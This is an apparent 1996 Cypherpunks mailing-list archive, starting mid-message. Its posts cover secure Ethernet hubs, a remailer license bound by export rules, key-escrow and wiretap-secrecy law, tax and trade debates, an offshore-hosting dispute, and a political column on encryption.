
Sure they do. You'd have a reasonable assurance that wherever you went,
you'd be the only one seeing your packets -- assuming the backbone is
secure, which you need to assume anyway if you're not doing packet, session,
or application-layer encryption (which is the ultimate goal). The roving
portable computer is a pretty common case nowadays. The only thing a static
table gets you is intruder control. 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Wed, 14 Aug 1996 13:40:51 +0800
To: gt4436c@prism.gatech.edu (Jeremy Mineweaser)
Subject: Re: [NOISE] Geek Apartments
In-Reply-To: <2.2.32.19960813234024.00c5ebcc@glc20.residence.gatech.edu>
Message-ID: <199608140306.XAA02313@nrk.com>
MIME-Version: 1.0
Content-Type: text


CWRU ran:
{hope I get it correct}
	2 pieces CAT 5
	Monomode
	Multimode
	2 pieces CAT1 for phone
	Thinnet
and something else to every "room" around. Even the payphone kiosk
in Stosacker Hall.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: loki@infonex.com (Lance Cottrell)
Date: Wed, 14 Aug 1996 17:23:39 +0800
To: remailer-operators@c2.org
Subject: Re: WinSock Remailer Now Available By E-Mail
Message-ID: <ae371e2b04021004e72d@[206.170.115.3]>
MIME-Version: 1.0
Content-Type: text/plain


I would be happy to distribute it from my site, along side Mixmaster.

        -Lance

At 3:15 PM 8/13/96, Joey Grasty wrote:
>-----BEGIN PGP SIGNED MESSAGE-----
>
>The first alpha release of the WinSock Remailer is now available via
>e-mail.  Due to problems setting up user authentication on my homepage
>at
>
>  http://www.c2.net/~winsock/
>
>I have decided to distribute it via e-mail until I can get user
>authentication working.
>
>In order for you to receive the WinSock Remailer, I have to be reasonably
>sure that you are a US or Canadian citizen or permanent resident.
>Therefore, you will need to review a copy of the License Agreement and
>fill out the required information.  Then clear-sign the agreement with PGP
>and mail it to me at jgrasty@gate.net.  Don't forget to tell me where I can
>find your PGP public key so that I can check the signature.  No signed
>license agreement, no remailer.
>
>In order for me to have a good feeling that you are not a foreign national,
>I need to have the following information check out:
>
>a.  Verify that your address is within the boundaries of the US or Canada.
>    I will do this by checking if you are in a public address database such
>    as "88 Million Households Phone Book".
>b.  Verify that your name and e-mail address is the same as in your public
>    key.
>
>This is basically the same method that Netscape is using at:
>
>  http://wwwus.netscape.com/eng/US-Current/
>
>to verify citizenship or permanent residency, but the process is not
>automated.
>
>I don't like having to enforce clearly unconstitutional ITAR regulations,
>but I'm not ready for an extended stay at Club Fed.
>
>- ---------------------------cut here-----------------------------------
>WinSock Remailer License Agreement
>
>This is the license agreement between Joey Grasty and the end user
>of the WinSock Remailer.
>
>Name of User: <your name>
>Street Address:  <your street address>
>Town, State, Country: <town>, <state or province>, <country>
>Phone Number: <your phone number>
>E-mail Address: <your e-mail address>
>Where to find your PGP Public Key: <instructions>
>
>
>1. Joey Grasty grants to you a non-exclusive, non-sublicensable,
>license to use this Alpha version of the WinSock Remailer (the
>"Software"), in binary executable form for evaluation and trial use
>purposes only.
>
>2. JOEY GRASTY MAKES NO REPRESENTATIONS ABOUT THE SUITABILITY OF THIS
>SOFTWARE OR ABOUT ANY CONTENT OR INFORMATION MADE ACCESSIBLE BY THE
>SOFTWARE, FOR ANY PURPOSE.  THE SOFTWARE IS PROVIDED 'AS IS' WITHOUT
>EXPRESS OR IMPLIED WARRANTIES, INCLUDING WARRANTIES OF MERCHANTABILITY
>AND FITNESS FOR A PARTICULAR PURPOSE OR NONINFRINGEMENT.  THIS SOFTWARE
>IS PROVIDED GRATUITOUSLY AND, ACCORDINGLY, JOEY GRASTY SHALL NOT BE LIABLE
>UNDER ANY THEORY OR ANY DAMAGES SUFFERED BY YOU OR ANY USER OF THE
>SOFTWARE.  JOEY GRASTY DOES NOT HAVE ANY OBLIGATION TO SUPPORT THIS
>SOFTWARE OR ISSUE ANY UPDATES IN THE FUTURE.
>
>3. While Joey Grasty intends to distribute a commercial release of the
>Software, Joey Grasty reserves the right at any time not to release a
>commercial release of the Software or, if released, to alter prices,
>features, specifications, capabilities, functions, licensing terms,
>release dates, general availability or any other characteristics of the
>commercial release as he sees fit.
>
>4. Title, ownership rights, and intellectual property rights in and to
>the Software shall remain in Joey Grasty and/or its suppliers.  You agree
>to abide by the copyright law and all other applicable laws of the
>United States including, but not limited to, export control laws.
>
>5. Joey Grasty may terminate this License at any time by delivering notice
>to you and you may terminate this License at any time by destroying or
>erasing your copy of the Software and notifying Joey Grasty of this action
>forthwith.  This License is personal to you and you agree not to assign your
>rights herein.  This License shall be governed by and construed in accordance
>with the laws of the State of Florida and, as to matters affecting copyrights,
>trademarks and patents, by U.S.  federal law.  This License sets forth the
>entire
>agreement between you and Joey Grasty.
>
>6. Use, duplication or disclosure by the Government of any locality, state
>or country, its elected officials or employees, is forbidden.
>
>7. You may not download or otherwise export or reexport the Software or
>any underlying information or technology except in full compliance with
>all United States and other applicable laws and regulations.  In
>particular, but without limitation, none of the Software or underlying
>information or technology may be downloaded or otherwise exported or
>reexported (i) into (or to a national or resident of) Cuba, Haiti,
>Iraq, Libya, Yugoslavia, North Korea, Iran, or Syria or (ii) to anyone
>on the US Treasury Department's list of Specially Designated Nationals
>or the US Commerce Department's Table of Deny Orders.  By downloading
>the Software, you are agreeing to the foregoing and you are
>representing and warranting that you are not located in, under control
>of, or a national or resident of any such country or on any such list.
>
>8. JOEY GRASTY OR ITS SUPPLIERS SHALL NOT BE LIABLE FOR (a) INCIDENTAL,
>CONSEQUENTIAL, SPECIAL OR INDIRECT DAMAGES OF ANY SORT, WHETHER ARISING IN
>TORT, CONTRACT OR OTHERWISE, EVEN IF JOEY GRASTY HAS BEEN INFORMED OF THE
>POSSIBILITY OF SUCH DAMAGES, OR (b) FOR ANY CLAIM BY ANY OTHER PARTY. THIS
>LIMITATION OF LIABILITY SHALL NOT APPLY TO LIABILITY FOR DEATH OR PERSONAL
>INJURY TO THE EXTENT APPLICABLE LAW PROHIBITS SUCH LIMITATION. FURTHERMORE,
>SOME STATES DO NOT ALLOW THE EXCLUSION OR LIMITATION OF INCIDENTAL OR
>CONSEQUENTIAL DAMAGES, SO THIS LIMITATION AND EXCLUSION MAY NOT APPLY TO
>YOU.
>
>9.  HIGH RISK ACTIVITIES.  The Software is not fault-tolerant and is not
>designed, manufactured or intended for use or resale as on-line control
>equipment in hazardous environments requiring fail-safe performance, such
>as in the operation of nuclear facilities, aircraft navigation or
>communication systems, air traffic control, direct life support machines,
>or weapons systems, in which the failure of the Software could lead
>directly to death, personal injury, or severe physical or environmental
>damage ("High Risk Activities").  Joey Grasty and its suppliers specifically
>disclaim any express or implied warranty of fitness for High Risk
>Activities.
>
>Clear-sign this agreement with your PGP public key and e-mail it to
>jgrasty@gate.net.
>
>- -------------------------------cut here------------------------------------
>
>Thank you for your patience with this crude form of distribution.
>
>Regards,
>
>
>-----BEGIN PGP SIGNATURE-----
>Version: 2.6.2
>
>iQB1AwUBMhE2UsODO2V89BZZAQGOLAL9GU15R4N/6xIZCJGYaQ0Vlw4e7rqP06+d
>YH5806om50v/+8P9OKrxBOECEHPJLirFQcITXsYMn/DkVAcTVTrz9rKfJdzToeyB
>Bwr4vgpMqKw4oZnFGJa1PvUotSjTnETT
>=Arts
>-----END PGP SIGNATURE-----
>
>--
>Joey Grasty
>jgrasty@gate.net [home -- encryption, privacy, RKBA and other hopeless causes]
>jgrasty@pts.mot.com [work -- designing pagers]
>"Anyone who considers arithmetical methods of producing random digits is,
>of course, in a state of sin." -- John Von Neumann
>PGP = A7 CC 31 E4 7E A3 36 13  93 F4 C9 06 89 51 F5 A7

----------------------------------------------------------
Lance Cottrell   loki@obscura.com
PGP 2.6 key available by finger or server.
Mixmaster, the next generation remailer, is now available!
http://www.obscura.com/~loki/Welcome.html or FTP to obscura.com

"Love is a snowmobile racing across the tundra.  Suddenly
it flips over, pinning you underneath.  At night the ice
weasels come."
                        --Nietzsche
----------------------------------------------------------






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 14 Aug 1996 16:25:40 +0800
To: cypherpunks@toad.com
Subject: [off-topic] Locating cell phones with power off?
Message-ID: <v02120d07ae3717374bfb@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


I seem to remember that somebody once mentioned that cell phones transmit
signal even with the power switch off. Supposedly, you have to take out the
batteries to cut the signal. The more I am thinking about it, the less
sense it makes. Can somebody here please confirm (or deny) this rumor?

TIA,



-- Lucky Green <mailto:shamrock@netcom.com> PGP encrypted mail preferred.
   Defeat the Demopublican Unity Party. Vote no on Clinton/Dole in November.
   Vote Harry Browne for President.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Wed, 14 Aug 1996 14:01:16 +0800
To: cypherpunks@toad.com
Subject: Re: Anguilla...etc.
In-Reply-To: <199608140219.TAA14383@dns2.noc.best.net>
Message-ID: <TPsmsD30w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


"Greg Kucharo" <sophi@best.com> writes:
>   While Tim may be right that nobility is lost when backing down to the
> authorities, the fact is that this game has little to do with noble
> purposes. ...

Nor was there any activity from the authorities.

A while back, when Vince first started advertizing his site, I asked him a few
hypothetical questions, and he said roughly this: If client X posts something
to Usenet from Vince's site, and if Y dislikes X's article so much that he
mailbombs X, then Vince would pull X's plug. (I have the exact quote saved.)
I lost interest right then. I'm not surprised that Vince acted dishonorably by
pulling a client's plug with no warning for a very flimsy reason.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Wed, 14 Aug 1996 06:17:11 +0800
To: cypherpunks@toad.com
Subject: Re: India, Productivity, and Tropical Climes
Message-ID: <1.5.4.32.19960813173132.002f7834@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 13:15 11/08/96 -0700, Timothy C. May wrote:
>At 4:17 AM 8/11/96, Arun Mehta wrote:
>>One of the
>>reasons that IBM was thrown out of India in the mid seventies was
>>their practice of shipping only outdated computers from the US to
>>India.

>This I tend to disagree with. I recall that India had some laws in the
>1970s which required companies to dislose trade secrets to them. As a
>result, IBM chose not to stay in India. I recall that Coca-Cola also
>refused to turn over the formula for Coke, but this may've been urban
>legend. The IBM case is pretty well-documented. IBM would've sold the
>latest and greatest technology to India if: a) it was profitable to them,
>b) if India could've paid for a 370/90 or whatever in 1975, c) if COCOM
>regulations would have allowed such a sale (doubtful, given the Ghandi
>dynasty's cozying up to the Sovs in the 70s.
>
>I don't think shipment of "old technology" to India was at all on IBM's
>list of concerns, certainly not back then.

Sorry, the response took a while: George Fernandes, who was the
industries minister at the time, is an acquaintance, so I thought
I'd get the story from the horse's mouth.

In the aftermath of the oil crisis, India was short of foreign
exchange, so it passed the Foreign Exchange Regulation Act (FERA)
under which foreign equity in an Indian company could only exceed
40% if the company was hi-tech or  produced something of critical
national importance. The government saw no reason why precious
foreign exchange should go out as profits on the sale of
toothpaste or cola. Coke claimed that its secret formula
qualified it as a hi-tech company, and so it should be allowed
100% ownership of its Indian subsidiary. The government saw no
reason why: that was easy. The Indian government wasn't asking
Coke to reveal its formula, merely dilute its holding to 40%. That one was easy.

As regards IBM, its agreement with the government of India, under
which it was allowed to operate in the country, stipulated that
it would produce here, and transfer some technology. Instead, as
the government found, all it did was sell time on second-hand
computers (1401's as I recall, and this was mid  to late '70s).
IBM was asked to either dilute, or live up to its original
agreement, which it wasn't prepared to do, so it left.
>
>As attractive as this sounds, historically this has not happened. And as
>many will tell you, the climate of the Bay Area in particular and
>California in general is extremely benign and delightful. The average
>winter temperature is only about 10C cooler than summer temperatures.

Didn't Mark Twain say that the coldest winter he had ever
experienced was a summer in San Francisco? I do agree, SF and
environs are great: but US immigration laws being what they are,
not everyone can move there -- some day, "routing around" might
make those places more attractive which have the least
restrictive immigration laws.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "I=(!isnum(self))" <null@null.gov>
Date: Wed, 14 Aug 1996 16:14:21 +0800
To: cypherpunks@toad.com
Subject: yet ANOTHER "Internet == child porn "story.
Message-ID: <32117610.271D@null.gov>
MIME-Version: 1.0
Content-Type: text/plain


Again on today's CBS all-news stn.
An elementary school teacher arrested for exchanging, or whatever, 
kiddieporn on the Internet.

The reporter was duly dramatic and ominous sounding.

Damn I wish I knew how many kiddie porners were doing their whatver OFF 
the 'net.  Maybe, my fine friends, we're catching MORE o' them because 
they are on the net and clueless, rather than in back alleys and hard to 
find.

------------------------------------------------------------------

Recommended reading:

"Manufacture of Consent", Noam Chomsky.

Altho I hate much of his politics, that one's right on.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Wed, 14 Aug 1996 15:03:02 +0800
To: cypherpunks@toad.com
Subject: 2600 (the magazine)
Message-ID: <199608140527.AAA06157@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

The current issue of 2600 is out. I bought mine at Barnes & Nobles.

It has a couple of articles on cryptography as well as a port scanner
program for Linux.


                                                  Jim Choate





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sasa.roskar@uni-lj.si
Date: Wed, 14 Aug 1996 09:53:46 +0800
To: cypherpunks@toad.com
Subject: Changing the headers
Message-ID: <009A6D03.6A10B362.18@uni-lj.si>
MIME-Version: 1.0
Content-Type: text/plain


Can someone please tell me how you can change the From: header
in the email? I know it's possible... my computer teacher used
to do it all the time... but how? (unfortunatelly his explanation
was to hard to comprehend for me at the time). Thanks a lot...
And in case it helps... I'm using a VAX.. regular text account.
If it makes any difference. Doesn't it have something to do woth
getting into the mail port? 

Roki




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Wed, 14 Aug 1996 08:07:25 +0800
To: Bart  Croughs <cypherpunks@toad.com>
Subject: re: National Socio-Economic Security Need for Encryption Technology
Message-ID: <1.5.4.32.19960813185919.002f9d2c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


Bart  Croughs wrote:
>I don't assume that the *total amount* of capital will be
lowered in the US when US capital moves abroad. I assume that the
amount of capital in the US will be *relatively lower*. So the
wages will be *relatively* lower (lower than when the capital
wouldn't have left the US), but not necessarily lower in any
absolute sense. I thought this was obvious, but since Arun Mehta
also misunderstood me, maybe I should have been more explicit here.

>	Henry Hazlitt in 'economics in one lesson' (p. 139): "The best
way to raise wages, therefore, is to raise marginal labor
productivity. This can be done by many methods: by an increase in
capital accumulation - i.e. by an increase in the machines with
which the workers are aided..."

Pardon me, but I'm still confused. When Hazlitt talks about how
many machines are employed, surely that's "absolute" capital, not
relative. If US capital is invested abroad sensibly, such that it
enriches the investors, they have more money to invest in
machines at home and thereby increase local productivity (and wages). 

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
http://www.cerfnet.com/~amehta/  finger amehta@cerfnet.com for public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Blaze <mab@research.att.com>
Date: Wed, 14 Aug 1996 16:20:00 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: key escrow idea from David Satelin of MIT Lincoln Labs
In-Reply-To: <199608140509.WAA06467@mail.pacifier.com>
Message-ID: <199608140548.BAA05495@nsa.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain



[Please include me on any mail you want me to see, as I don't
read the cypherpunks list these days]

>
>>In Staelin's proposal government gains access to the communications,
>>but does not gain "real-time access" as desired by the FBI.  This loss
>>may be tolerable, given the benefit obtained (forcing access to be
>>made in accordance with the Constitutional requirements for
>>notification before search).
>
>It sounds like you're saying that the government must inform the target of 
>the wiretap BEFORE doing it.  ("notification before search")  Right?  That 
>would at least be better than the status quo.
>
You may be confused.  I hope it was clear that I didn't write that.
That text was part of the message from Ron Rivest that I included in my
message.
>
...

>>------- End of Forwarded Message
>>
>
...

>As far as I'm aware, if the police serve an ordinary search warrant at a 
>particular address, they  can't prohibit the targets of that warrant from 
>telling anyone else of this.  It seems to me that the main reason police 
>have gotten used to the idea of doing search warrants secretly is that the 
>local phonecos have been monopolies so long, and they're so used to 
>cooperating with government and the cops (as evidenced by the fact that 
>police regularly got illegal wiretaps before 1968), that this has soaked in 
>as being expected.  Indeed, the pre-'68 illegal wiretaps prove beyond a 
>shadow of a doubt that government and the telephone company never have had 
>any sort of arm's-length relationship, and strongly suggest that the 
>Constitutionality of wiretapping (vis a vis the constitutionality of 
>phoneco's claimed responsibility to keep the whole thing secret) has never 
>been legitimately tested.
>
>Remember, since the phoneco has had no competition, they've never been at 
>risk from being shunned by customers who object to this secret cooperation.  
>A more "realistic" position, I think, would be to conclude that if there was 
>true competition, customers would be able to negotiate varying levels of 
>non-cooperation in order to win customers.  I suspect that post-Ruby 
>Ridge/post-Waco, there would be a substantial fraction of the public who 
>would conclude that it cannot trust its own government.
>

Well, I don't know what went on before 1968, but these days phone companies
don't keep wiretap orders secret because they are being nice to the police,
they keep them secret because the court order for the weretap also orders
them to.  Perhaps you aren't aware of this, but when a third party  is
ordered to turn over records or access to something, the order often
includes a provision that prohibits them from revealing the order to the
subject.  This is not unique to phone records; orders for bank records
frequently have secrecy provisions as well.

-matt




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 14 Aug 1996 16:30:22 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Capital and Taxes
In-Reply-To: <ae36838e05021004b025@[205.199.118.202]>
Message-ID: <Pine.SOL.3.91.960814013949.25101A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 13 Aug 1996, Timothy C. May wrote:
> 
> But this 38% rate doesn't even tell the whole story. Suppose that I want to
> make a $100K investment in this company my friends are trying to start.
> Money has a cost, both in the "rent" that is charged on it, or the "rent"
> that _could have_ been charged to another for an alternate use, and on
> something else that's terribly important: taxes must be paid on other
> assets sold to raise the $100K. For example, if I own shares in Intel,
> bought many years ago, I have to sell $160,000 worth of Intel stock, send a
> $60,000 check to Uncle Sam and Uncle Pete, and then send the remaining
> $100,000 to my friends. If the new investment *doubles*, my $100,000 gain
> is taxed at 38% and I'm left with a gain of about $62,000.
> 
> It doesn't take a number theorist to see that I may as well have not even
> bothered. So long as I just sit on the Intel stock, no taxes are owed.
> Sounds like a no brainer to me.
> 
> Yes, taxes will _someday_ have to be paid...but many of us are hoping,
> praying, and pleading for a cut in the capital gains tax rate...at least a
> rollback to the 22% rate of yesteryear (and 4% or less in states). This
> huge "backlog" of unrealized capital gains (aka gains on paper, but not yet
> taxable) is what is being spoken of when people like Jack Kemp and Steve
> Forbes speak of "unleashing" the capital gains now tied up due to the high
> tax rates.


Now imagine that I want to make that $100K investment or, more 
realistically, that I want to invest $100K in my kid's college education.
I'm going to have to earn wages of $160K and pay $60K in tax.  It would 
make me cranky if the guy next door could just clip $100K of coupons, tax 
free, to pay for his kid's education.

While I'm sure Steve Forbes could, I can't think of a moral argument why 
income from selling stock should be taxed at a rate lower (or higher) than 
than income from wages.

Jamie Whitten, late chairman of the House Appropriations Committee once 
said, "All anyone wants is a special advantage over the next fellow.  
Understand that, and you've understood the intent of every law ever passed."

I think that applies to tax law.

bd




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Frank Stuart <fstuart@vetmed.auburn.edu>
Date: Wed, 14 Aug 1996 18:11:13 +0800
To: cypherpunks@toad.com
Subject: [SIGNAL] Microsoft's Internet Explorer
Message-ID: <199608140728.CAA20496@snoopy.vetmed.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sorry, no rants, economic theories, or chemistry questions, but...

According to C-Net Radio (http://www.cnet.com/), Microsoft will be including
128-bit SSL encryption in their Internet Explorer 3.0 for Win 95 and NT 4.0.

It took a bit of digging but I finally found the Microsoft press release at
"http://www.microsoft.com/corpinfo/press/1996/aug96/128SECpr.htm".

                          | (Douglas) Hofstadter's Law:
                          | It always takes longer than you expect, even 
Frank Stuart              | when you take into account Hofstadter's Law.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rabid Wombat <wombat@mcfeely.bsfs.org>
Date: Wed, 14 Aug 1996 15:32:38 +0800
To: Rich Graves <rich@c2.org>
Subject: Re: [NOISE] Geek Apartments and Etherpunks
In-Reply-To: <Pine.GUL.3.95.960813140118.5632A-100000@Networking.Stanford.EDU>
Message-ID: <Pine.BSF.3.91.960814043926.771A-100000@mcfeely.bsfs.org>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 13 Aug 1996, Rich Graves wrote:

> On Tue, 13 Aug 1996, Ben Combee wrote:
> 
> 
> The "secure hubs" at GATech don't do encryption -- no way could that be done
> at wire speed. What they do is fill the data portion of the Ethernet packet
> with nulls. Everyone gets to see the source and destination MAC address and
> length of every packet, but only the recipient (or a very clever spoofer --
> most of the "secure hubs" on the market have a few vulnerabilities) gets
> the data.

What vulnerabilities? I've heard tell of some(?) that "leak" unscrambled 
packets if flooded with extreme traffic levels, but have never seen or 
verified this. Got any specifics?

> 
> If you run a packet sniffer, all you get are CRC errors (in order to
> maintain wire speed, the non-destination ports don't compute one). 
> 
> As far as real-world geek apartments go, I heard of one in Manhattan that
> worked exactly as described. I don't know whether they run "secure hubs."
> Presumably they would -- I can't think of a major manufacturer's manageable
> 10BaseT hub that lacks MAC address lockout features.

Most manufacturers offer SNMP-manageable hubs, but these don't offer 
MAC-layer security. That usually costs a lot extra. The MAC-layer feature 
is not widely used.

> 
> OTOH, I've heard tell that several of the residential coax experiments run
> promiscuously. Everything your neighbor does online, you can see with the
> right software.
> 

If it is Ethernet (or any baseband technology, AFAIK), and on coax, then 
of course it is "promiscuous." All devices must see the packet; they're 
on a bus. The 10T hubs also follow the "all devices must see the packet 
rule", but by design; a packet is received on the "recieve" pair of one 
port, and transmitted on the "xmit" pairs of all ports. The secure hubs 
overwrite the data payload with "junk" first - no encryption involved, 
nothing to crack, and, as you've pointed out, without recomputing CRC.

btw - if I were in an apartment environment, I'd want the "secure hubs",
and would verify that they're actually in the secure mode. They usually
have a "learning" mode, where they simply register the MAC address most
recently assigned to each port (sort of like learning bridges - this saves
a lot of manual entry). Of course, if left in this mode, they don't do a
thing for security. On the flip side, if sucured, and you change network
cards, or bring that laptop home from the office, etc. you won't be able
to use it without the intervention of the hub's administrator. 

And yes, packet sniffers are easy to get a hold of; freeware is abundant. 
Anyone can easily use one on a segment they've got access to.

- r.w.


> -rich
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Perry <perry@alpha.jpunix.com>
Date: Wed, 14 Aug 1996 22:12:10 +0800
To: raph@kiwi.cs.berkeley.edu
Subject: new type2.list/pubring.mix
Message-ID: <199608141058.FAA17233@alpha.jpunix.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello Everyone,

	There is an updated type2.list/pubring.mix combination
available for the mixmaster remailer software. You can get it via WWW
from www.jpunix.com or by anonymous FTP from ftp.jpunix.com. Of note
is the addition of the squirrel remailer. Welcome aboard!

- -- 
 John Perry - perry@alpha.jpunix.com -  PGP-encrypted e-mail welcome!
 WWW - http://www.jpunix.com
 PGP 2.62 key for perry@jpunix.com is on the keyservers.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMhGxS1OTpEThrthvAQERXgP9FQJK5byJ2bXPIy1jwzZSBt6qNgMRCXph
rqDRijUxehiSpmis5mq3gTtH/CcA7wAqkxLfO9izE3sC4HqWCd7B5D7KLZx9VPNG
kZvUfQrZjzubLtz4ly0DtEDtnbKTEFLZ1tJL1ZUnZgsKTLEmeEIsXDc6r5zaGC0F
E/U+SBe2oOg=
=gYJD
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 22:09:56 +0800
To: "James A. Donald" <jamesd@echeque.com>
Subject: Passports - "fake" vs "counterfeit"
In-Reply-To: <199608140439.VAA28830@dns2.noc.best.net>
Message-ID: <Pine.LNX.3.91.960814070828.12021A@offshore>
MIME-Version: 1.0
Content-Type: text/plain



On Tue, 13 Aug 1996, James A. Donald wrote:
>
> He never sold fake passports.  If his passports had been marked 
> "United States of America" or some such they would indeed be
> fake.  They were not fake.  

Websters defines fake with "to treat so as to falsify", "pretend",
"simulate", "imitation", "impostor", "sham", "faud", and "counterfeit". 
The passports fit most of these definitions.  A word applies if any of the
definitions work. 

If the passports had been marked "US of A" they would have been
"counterfeit". I did not say they were counterfeit (he clearly would not
be permitted to sell counterfeit passports).  

So his passports are not "counterfeit", but they are "fake". 

   --  Vince
 
-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@replay.com (Anonymous)
Date: Wed, 14 Aug 1996 15:38:57 +0800
To: cypherpunks@toad.com
Subject: [NOISE] Statists get to make choices, too.
Message-ID: <199608140545.HAA13218@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Dimitri Vulis KOTM writes:

>There is no place on the 'net safe for the Usenet Cabal or the fucking statists
>who call themselves "libertarians".

Oh, sure there is. The Misguided Cabal Dupes [tm] have decided they prefer
the relative order of the current system to the chaos of a disbarred
lawyer's vision. News admins have simply taken extra steps to make sure
that their services won't be disrupted by a few individuals who style
themselves the "Usenet Freedom Knights." I'm sure the Fucking Statists have
taken similar steps.

Your right to rant doesn't override my right to ignore you. Isn't that
really what this country's supposed to be about? The right to be left
alone?






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vincent Cate <vince@offshore.com.ai>
Date: Wed, 14 Aug 1996 23:00:22 +0800
To: cypherpunks@toad.com
Subject: Anguilla - commercial and mailbombing policies
In-Reply-To: <Pine.LNX.3.91.960814072543.12056A-100000@offshore>
Message-ID: <Pine.LNX.3.91.960814073103.12075A-100000@offshore>
MIME-Version: 1.0
Content-Type: text/plain



Dr.Dimitri Vulis KOTM <dlv@bwalk.dm.com>
> 
> A while back, when Vince first started advertizing his site, I asked him
>a few hypothetical questions, and he said roughly this: If client X posts
>something to Usenet from Vince's site, and if Y dislikes X's article so
>much that he mailbombs X, then Vince would pull X's plug. (I have the
>exact quote saved.) I lost interest right then. I'm not surprised that
>Vince acted dishonorably by pulling a client's plug with no warning for a
>very flimsy reason. 

That question was about commercial ads, and I said "As long as I am not
mailbombed I don't care about how you post.".  I did *not* say I would
pull the plug (full exchange below).  From your other questions it looked
like there was no chance of you being a customer so I did not fully
explain. 

I have been mailbombed around a dozen times in the last year and never cut
anyone off.  Details below (I too have the exact quote)... 

Dimitri:
> e) to spam usenet with commercial ads.

Vince:
>e) I think you would have to spam more than 100 groups to get my
>system mail bombed.  As long as I am not mailbombed I don't
>care about how you post.

First, yes, that 100 groups is off the wall.

What I meant was you can send out commercial ads and I don't care at all. 
If you get mailbombed, that is another issue.  

If mailbombed then it goes toward your traffic.  You get 100 MB/month of
traffic with a domain name, and if you go over that amount of traffic the
cost is $1/MB.  If you have prepaid by check, and I don't know who you
are, and your account goes below $0, I would cut you off till more money
came in. 

Sorry for not explaining that.

 --  Vince

-----------------------------------------------------------------------
Vincent Cate   vince@offshore.com.ai  http://www.offshore.com.ai/vince/
Offshore Information Services         http://www.offshore.com.ai/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Brad Dolan <bdolan@use.usit.net>
Date: Wed, 14 Aug 1996 23:32:13 +0800
To: cypherpunks@toad.com
Subject: Schlafly on crypto
Message-ID: <Pine.SOL.3.91.960814075845.22879A-100000@use.usit.net>
MIME-Version: 1.0
Content-Type: text/plain


Subject: Clinton Is Trying to be Big Brother -- Phyllis Schlafly Column 8/8/96


                    Clinton Is Trying to be Big Brother



     August 8, 1996                             by Phyllis Schlafly

     We hope the appropriate government agencies will soon solve the
     recent terrorist crimes and punish the criminals. But all
     Americans who care about civil liberties should vigorously resist
     President Clinton's attempt to use the terrorist attacks as an
     excuse to carry on his all-out war against the personal privacy of
     law-abiding Americans.

     This mind-set was first revealed in the Clinton health care bill,
     which would have given the government computer access to the
     medical records of all Americans. Fortunately, that totalitarian
     takeover of the health care industry was rejected.

     The Clinton Administration's education legislation now pending in
     Congress would put personal information about all schoolchildren
     -- academic, medical, attitudinal, behavioral, and family -- into
     an expanded Labor Market Information database available to the
     government, as well as to prospective employers.

     Now the Clinton Administration is trying to make it illegal for
     individual Americans to have private conversations with one
     another. That's the real meaning of its effort to control
     encryption technology, and it's a direct assault on the First
     Amendment.

     It would be downright ridiculous to assert that the First
     Amendment guarantees our right to speak in public but not in
     private. It would be just as ridiculous to say that we have
     freedom to speak in words that the government can understand, but
     not in words the government can't decipher.

     Americans have the right to speak to one another in private,
     behind closed doors, and we should likewise have the right to
     speak to one another in code and to put our coded messages on
     computer in a process called encryption. Americans would not
     tolerate the government opening and reading the letters we send
     through the mails, and we should not tolerate the government
     opening and reading our encrypted, or coded, messages sent via
     computer.

